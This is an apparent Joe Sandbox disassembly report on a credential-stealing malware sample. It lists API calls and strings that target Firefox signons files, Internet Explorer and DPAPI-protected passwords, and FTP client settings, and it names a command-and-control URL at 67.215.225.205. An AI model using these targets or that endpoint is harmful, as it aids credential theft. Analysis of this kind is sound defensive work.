                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocFolderLocalPath
                                        • String ID: *LA$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                        • API String ID: 1254228173-354294624
                                        • Opcode ID: 7fec1d3e61f3feca6de6d161362341445026920e8f5d36ff699d061ec1d7d0a9
                                        • Instruction ID: 4cb5a2a24a71925c310593c43afaf503172ba59323d0c2f3b18a639a8d0b135b
                                        • Opcode Fuzzy Hash: 7fec1d3e61f3feca6de6d161362341445026920e8f5d36ff699d061ec1d7d0a9
                                        • Instruction Fuzzy Hash: 48017172A04605FBDB109FA0DC01F9AB7A5AF90754F208177E115BA2E0E778AB40DB99
                                        APIs
                                          • Part of subcall function 00403E3C: WSAStartup.WSOCK32(00000101,?), ref: 00403E51
                                        • Sleep.KERNEL32(00001388,00000000,00000000,?,00000000), ref: 0040FB9A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: SleepStartup
                                        • String ID: Client Hash$http://67.215.225.205:8080/forum/viewtopic.php
                                        • API String ID: 1372284471-2775902078
                                        • Opcode ID: a3269650c58c9da7f5beb3831232c0bf44e9a4ab19e285d2e0cb401876a42a6e
                                        • Instruction ID: 8b4c8722f9cea48706245652907ee635cf1d43610685aa9f03bd54f726094e1f
                                        • Opcode Fuzzy Hash: a3269650c58c9da7f5beb3831232c0bf44e9a4ab19e285d2e0cb401876a42a6e
                                        • Instruction Fuzzy Hash: 2721E03190024A9ADF31ABD1C955BFF76B8AB40349F64003BE240719D1D7BC6A8DDF6A
                                        APIs
                                        • StrStrIA.SHLWAPI(011B4128,Odin), ref: 00409F2E
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeLocal
                                        • String ID: Odin$SiteInfo.QFP
                                        • API String ID: 2826327444-4277389770
                                        • Opcode ID: 3364458b29281769122b882b30e5182c35c2af25c32701b4a890b84978b81900
                                        • Instruction ID: b721dd6199e606a7405d3023bbd8d78726059eb790ab865cdb695182bc14a4f7
                                        • Opcode Fuzzy Hash: 3364458b29281769122b882b30e5182c35c2af25c32701b4a890b84978b81900
                                        • Instruction Fuzzy Hash: 8F0192709041457AEB2137628C02FAE3E599F91354F24447BBA05F51E3DABC9E8197AC
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040741F
                                        • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407453
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004074B6
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpenValue
                                        • String ID:
                                        • API String ID: 4012628704-0
                                        • Opcode ID: 7cf45e06979cf2661d412ee5068b3bb22eeb6c37c9b81cf8d53f81917df225d8
                                        • Instruction ID: 155f66e0a3eb4ed45e6c31c6170a54985ca42cf8ad1f2557258d09283c9eb503
                                        • Opcode Fuzzy Hash: 7cf45e06979cf2661d412ee5068b3bb22eeb6c37c9b81cf8d53f81917df225d8
                                        • Instruction Fuzzy Hash: 4C111C3180010CBADF21AF90CC41BDEBBB9BF04304F1081B6B614B41A1DBB9AB959F99
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F1EA
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F21E
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F278
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID:
                                        • API String ID: 1332880857-0
                                        • Opcode ID: b2d30eb2bdb4853a3c84d6db42dd5d871784dca00c657ab78dc8cd12eb9f17d8
                                        • Instruction ID: 7aeed7f2fb9415a72b7facb0512b1517e4b34102ea468ddb99e87d09525f193d
                                        • Opcode Fuzzy Hash: b2d30eb2bdb4853a3c84d6db42dd5d871784dca00c657ab78dc8cd12eb9f17d8
                                        • Instruction Fuzzy Hash: F411303590020CBADF21AFA0CC42FED7BB9BF00304F1084BAB514740A1DBB99A95AF58
                                        APIs
                                        • socket.WSOCK32(00000002,00000001,00000006), ref: 00403650
                                        • connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 004036AC
                                        • closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 004036B7
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: closesocketconnectsocket
                                        • String ID:
                                        • API String ID: 643388700-0
                                        • Opcode ID: adbb6ac0b90987b23a3262b7a8cba8f3f0728d4c9bf546c130d88563fe805f45
                                        • Instruction ID: 0f4e70b3c385995e94c185cadd9b4dcc0b5eff5d6ab24c1b6e743b0ce68c8e52
                                        • Opcode Fuzzy Hash: adbb6ac0b90987b23a3262b7a8cba8f3f0728d4c9bf546c130d88563fe805f45
                                        • Instruction Fuzzy Hash: 63018870904208BADB309E65CC81BEE775DAB00329F108E3BB525A53D1D7BE96848E5A
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F14B
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F17B
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F1CE
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID:
                                        • API String ID: 1332880857-0
                                        • Opcode ID: 1e6cd5474725fc5df6579a1196cd532cd4464ffdccfbeb21048c464faf3b0f79
                                        • Instruction ID: ff92f93e4485b710124cf93b1b5f9baed602077e37f661a9b7d9a33083fb913e
                                        • Opcode Fuzzy Hash: 1e6cd5474725fc5df6579a1196cd532cd4464ffdccfbeb21048c464faf3b0f79
                                        • Instruction Fuzzy Hash: 81110C3190410CFADF21AF91CC42BED7BB9BF04304F1084B6B614B51A1DBB99A95AF99
                                        APIs
                                        • StrStrIA.SHLWAPI(?,EasyFTP), ref: 0040C9D6
                                          • Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
                                          • Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
                                          • Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
                                          • Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        Strings
                                        • EasyFTP, xrefs: 0040C9CE
                                        • SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040C9B8
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$FreeLocal
                                        • String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
                                        • API String ID: 1884169789-2776585315
                                        • Opcode ID: 4b651430f1d431a53fd7f1d7f29a10b4bdb0120e32550dfdcc86950108ae2971
                                        • Instruction ID: 38cd4040eac23dbc5003c29778b8620063ef749b381af0bc32b7c6151f96b470
                                        • Opcode Fuzzy Hash: 4b651430f1d431a53fd7f1d7f29a10b4bdb0120e32550dfdcc86950108ae2971
                                        • Instruction Fuzzy Hash: 1CF03670A40208BAEF117B62CC47F9D7E659F00748F60417BB914B41F1DBB99F519A5C
                                        APIs
                                        • GetHGlobalFromStream.OLE32(00000000,?), ref: 00403DF4
                                        • GlobalLock.KERNEL32(?), ref: 00403E0B
                                          • Part of subcall function 00403C26: InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403C99
                                        • GlobalUnlock.KERNEL32(?), ref: 00403E28
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Global$CrackFromInternetLockStreamUnlock
                                        • String ID:
                                        • API String ID: 1075796459-0
                                        • Opcode ID: ce55fd528eaf758c4a5372cfb4888708a2d2c61cd53c49750d7f58bce14e3a50
                                        • Instruction ID: 0fc2f376dfeef626b66e1d29bc1a390a64e8a5b62cb5dc3ba2aecaad03027e41
                                        • Opcode Fuzzy Hash: ce55fd528eaf758c4a5372cfb4888708a2d2c61cd53c49750d7f58bce14e3a50
                                        • Instruction Fuzzy Hash: 64F0493050010CBBDF01AFA5CC45AEE7F69EB04319F10863AB924A41F1D7B98FA0EB58
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407CC7
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                          • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                          • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
                                        • String ID: \32BitFtp.ini
                                        • API String ID: 2776971706-1260517637
                                        • Opcode ID: 84e47ae72e4090bf6b37d5a2a60b7c4628951cfe3f0146c0d9a50f58c1a126cf
                                        • Instruction ID: bd2dbbae8e9f8974edebc8d7c7c3b56a6b553cfccc15916b2df4de00301a83f1
                                        • Opcode Fuzzy Hash: 84e47ae72e4090bf6b37d5a2a60b7c4628951cfe3f0146c0d9a50f58c1a126cf
                                        • Instruction Fuzzy Hash: 6AF08271A0020CBAEB20BB61CC42FDE7A299B40348F500437BA04F61E2DABDEB80565D
                                        APIs
                                        • LoadLibraryA.KERNEL32(?), ref: 00402326
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00402354
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID:
                                        • API String ID: 2574300362-0
                                        • Opcode ID: c565f1aa3f4fda05442a02a35214380c9171b068020167273cef74c294764032
                                        • Instruction ID: 1dfa1c1e5af10fc35452843b0631d1bd73dd53e789340300057ab7dd164a1ecb
                                        • Opcode Fuzzy Hash: c565f1aa3f4fda05442a02a35214380c9171b068020167273cef74c294764032
                                        • Instruction Fuzzy Hash: 64F0907320510926D7105539AD4899BAB88E7D3378B145137ED55E62C0E1BDDD81C2A4
                                        APIs
                                        • CreateFileA.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401DA9
                                        • CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401DB6
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateFileHandle
                                        • String ID:
                                        • API String ID: 3498533004-0
                                        • Opcode ID: 29885c1d9da61ee7b7d59970356271c23f7b0ac0678618ded3fe9124e386af44
                                        • Instruction ID: 90587616b231e62f0ce0a1ca71656843b80ecc2effe649e52ec39507118c715a
                                        • Opcode Fuzzy Hash: 29885c1d9da61ee7b7d59970356271c23f7b0ac0678618ded3fe9124e386af44
                                        • Instruction Fuzzy Hash: 10E04F7235024437EB3115699C83F5A3AC85B11B58F104432B641BD2D1D5E9F9C1466C
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: .xml
                                        • API String ID: 1659193697-2937849440
                                        • Opcode ID: e661d0f5c6da48302626efe8c0d24da70cca5f3d29aa0d08996af125c8b87a97
                                        • Instruction ID: 654528fb6c6b9d08504cb05bd4ae52cf434344222dfee05949ef85a016581d04
                                        • Opcode Fuzzy Hash: e661d0f5c6da48302626efe8c0d24da70cca5f3d29aa0d08996af125c8b87a97
                                        • Instruction Fuzzy Hash: 84F03031800108FBDF11AF91CC42ECD7A76AB54318F208166F524B11E0C7799BA4EB48
                                        APIs
                                        • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000), ref: 00401E0D
                                          • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 00401E28
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EnvironmentExpandLocalStrings$AllocFree
                                        • String ID:
                                        • API String ID: 2376306162-0
                                        • Opcode ID: 4eb245ddf13acbf0e75f31ade5cff1370375b6a9761235cdb6171c3728abaefc
                                        • Instruction ID: 24368c84768ad20674b47a6cedeb084af262bdde019d902b2cc9b9c42f429847
                                        • Opcode Fuzzy Hash: 4eb245ddf13acbf0e75f31ade5cff1370375b6a9761235cdb6171c3728abaefc
                                        • Instruction Fuzzy Hash: 91E01271A00109FBDF11AAB1CD02FAF7A69AB10388F2045367D14F51F1D7799F50A69C
                                        APIs
                                        • connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 004036AC
                                        • closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 004036B7
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: closesocketconnect
                                        • String ID:
                                        • API String ID: 1323028321-0
                                        • Opcode ID: d6c968b658abe3d36e81043180a00b0d96a7d8992d9790436992e27dcae3281c
                                        • Instruction ID: be6505267f29f4178e4e45716bfd2a082c1c90b363e213ca25923fe40938077a
                                        • Opcode Fuzzy Hash: d6c968b658abe3d36e81043180a00b0d96a7d8992d9790436992e27dcae3281c
                                        • Instruction Fuzzy Hash: 78D0C9B1A0020879D710DABA5DC29FEA65DAB10328F105E3BB526E12C1E5BDC5845E29
                                        APIs
                                        • send.WSOCK32(?,?,00000000,00000000), ref: 004036EC
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: send
                                        • String ID:
                                        • API String ID: 2809346765-0
                                        • Opcode ID: 6796e4a979f46f7e14b9463c85c033f8f1df5933707a7bbe8b597650c4fb955e
                                        • Instruction ID: be9ef6ce2d4025a438cc5a6b6f313f8180328372e462bd93b64e20afe6ef20d9
                                        • Opcode Fuzzy Hash: 6796e4a979f46f7e14b9463c85c033f8f1df5933707a7bbe8b597650c4fb955e
                                        • Instruction Fuzzy Hash: 88F0A072300248EBDB104E55DC40B5B3B58E791369F20443BFA01A73C1D3BAEA918758
                                        APIs
                                        • select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403756
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: select
                                        • String ID:
                                        • API String ID: 1274211008-0
                                        • Opcode ID: 589277c18e245aacdd3829cde8053bbf312a351eb7740a65391bf8dbcda2696d
                                        • Instruction ID: e8c92696a27f7789f9168a37488be3243172b4df61387a138d61a6e4929c29f7
                                        • Opcode Fuzzy Hash: 589277c18e245aacdd3829cde8053bbf312a351eb7740a65391bf8dbcda2696d
                                        • Instruction Fuzzy Hash: C8F037B551011CAEDB209F14CC51BD9BB78EB14714F1081A1E558E61D0D7F59BC48F55
                                        APIs
                                        • setsockopt.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 00403C1D
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: setsockopt
                                        • String ID:
                                        • API String ID: 3981526788-0
                                        • Opcode ID: 31c99b0a74ce9338f0b04b6a28a6c6564a948aa46e863f54856cd2301dc91045
                                        • Instruction ID: 9de39b6423a18e4b635914f995573c2f828d2e73ec19ed757491c159e372b79a
                                        • Opcode Fuzzy Hash: 31c99b0a74ce9338f0b04b6a28a6c6564a948aa46e863f54856cd2301dc91045
                                        • Instruction Fuzzy Hash: 9AD0A77054020CB1D710D740CD03EDD72785F00708F108230B750BA1E1E7F55B88934D
                                        APIs
                                        • WSAStartup.WSOCK32(00000101,?), ref: 00403E51
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID:
                                        • API String ID: 724789610-0
                                        • Opcode ID: ffab5162380fe3af86914e81f9cfe18dae7339984c6a2ef45e840d9542290845
                                        • Instruction ID: 408fbaf15a75b0da35fbc24d3226a342d8ed0cf0f325acef7b37683ef5936850
                                        • Opcode Fuzzy Hash: ffab5162380fe3af86914e81f9cfe18dae7339984c6a2ef45e840d9542290845
                                        • Instruction Fuzzy Hash: 5FB0923161020836EA10E6958C439DA729D4744748F4001A13A59D12C2EEE5AAC04AEA
                                        APIs
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00401016
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID:
                                        • API String ID: 2244384528-0
                                        • Opcode ID: 421d0a860c6d9d165e723f529cb45f0477ca61d72d068e36a6a36305f6e12bb0
                                        • Instruction ID: b431a99ddbd6f298bdb6c6cbc4e5d632e74455fe4781730d40ac7f96afd32023
                                        • Opcode Fuzzy Hash: 421d0a860c6d9d165e723f529cb45f0477ca61d72d068e36a6a36305f6e12bb0
                                        • Instruction Fuzzy Hash: 37A0223238020030EE00EB808C83FCE28030B2CB8CF008022B3082C0C0C0FEC0E0C228
                                        APIs
                                        • LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeLocal
                                        • String ID:
                                        • API String ID: 2826327444-0
                                        • Opcode ID: c09eb3dfaaad0fcb77e880224629c9a10ca60c10ba5b4db41bc18a076b99674a
                                        • Instruction ID: 500c98066f7ad2306fab3d815ea7ca12909582ff6fddbe18178bd9c5c23c3a43
                                        • Opcode Fuzzy Hash: c09eb3dfaaad0fcb77e880224629c9a10ca60c10ba5b4db41bc18a076b99674a
                                        • Instruction Fuzzy Hash: 42C09B3210060C56DB116F25D949B9E79D4575034CF40C2376D05645B1D6B8D6D0C5D8
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocLocal
                                        • String ID:
                                        • API String ID: 3494564517-0
                                        • Opcode ID: bfd43a2e21fc68efd9c566fc8633d8267606145764da389cb582ccf157877ab6
                                        • Instruction ID: 0df91a5887059c29a5536f2b37c104e83e237d577eaeef3e17dd13c7587ff9d4
                                        • Opcode Fuzzy Hash: bfd43a2e21fc68efd9c566fc8633d8267606145764da389cb582ccf157877ab6
                                        • Instruction Fuzzy Hash: 0FB092B124020827E250AA49C803F5A738C9B10B8CF408122BB44A6282C8A8F89042BD
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 004096DC
                                        • lstrcmpiA.KERNEL32(00414FF5,?), ref: 00409709
                                        • lstrcmpiA.KERNEL32(00414FF7,?), ref: 00409726
                                        • FindNextFileA.KERNEL32(?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 004098BC
                                        • FindClose.KERNEL32(?,?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 004098CF
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                          • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                          • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                        • String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                        • API String ID: 3040542784-1405255088
                                        • Opcode ID: 5779c8a750443792198fb027128011ff13c60aa6543853fd979e69c056137fa7
                                        • Instruction ID: 0876a1ce564651239c7d921400908ae003098a0742f9dfd6c590efa37419d23c
                                        • Opcode Fuzzy Hash: 5779c8a750443792198fb027128011ff13c60aa6543853fd979e69c056137fa7
                                        • Instruction Fuzzy Hash: BA517631951109AAEF21BF21CC42AEE7B65AF40348F10847BB408711F2DB7D8ED19E6D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: explorer.exe
                                        • API String ID: 0-3187896405
                                        • Opcode ID: 60ed86e535dc6f4d37373210e17f1fc447725754a780f13e0bb98d9f5e9b3016
                                        • Instruction ID: 39a556bab7de2521a735243ee9caf64442084a5f1f6cbcaf95e7dd06fe242eca
                                        • Opcode Fuzzy Hash: 60ed86e535dc6f4d37373210e17f1fc447725754a780f13e0bb98d9f5e9b3016
                                        • Instruction Fuzzy Hash: 20311B70904208ABEB21AF61DE89BED7BB5BB04304F1041B7E505B11E1D7B89B85CE19
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $123456
                                        • API String ID: 0-521589362
                                        • Opcode ID: 484f20930e069a74e012fbf44b05a2d4cfccbb939365b68dd33aae01d2831020
                                        • Instruction ID: 56bff48c1d68297c5634c15b7123a5550f21f9c79597928d9221fdbdd2aa2f2f
                                        • Opcode Fuzzy Hash: 484f20930e069a74e012fbf44b05a2d4cfccbb939365b68dd33aae01d2831020
                                        • Instruction Fuzzy Hash: CC513B70904208FBEF119FA1DD46BDEBEB5AB44304F548066E504A91A2C7FA8AD4DB28
                                        APIs
                                          • Part of subcall function 0040A0E3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A11C
                                          • Part of subcall function 0040A0E3: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A125
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A3C5
                                        • lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A44F
                                        • lstrcmpiA.KERNEL32(?,WininetCacheCredentials), ref: 0040A46E
                                        • lstrcmpiA.KERNEL32(?,MS IE FTP Passwords), ref: 0040A48D
                                        • StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A4A6
                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A4EC
                                        • LocalFree.KERNEL32(?), ref: 0040A519
                                        • CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A543
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Freelstrcmpi$ByteCharMultiTaskWide$CryptDataLocalUnprotect
                                        • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                                        • API String ID: 2957877119-3076635702
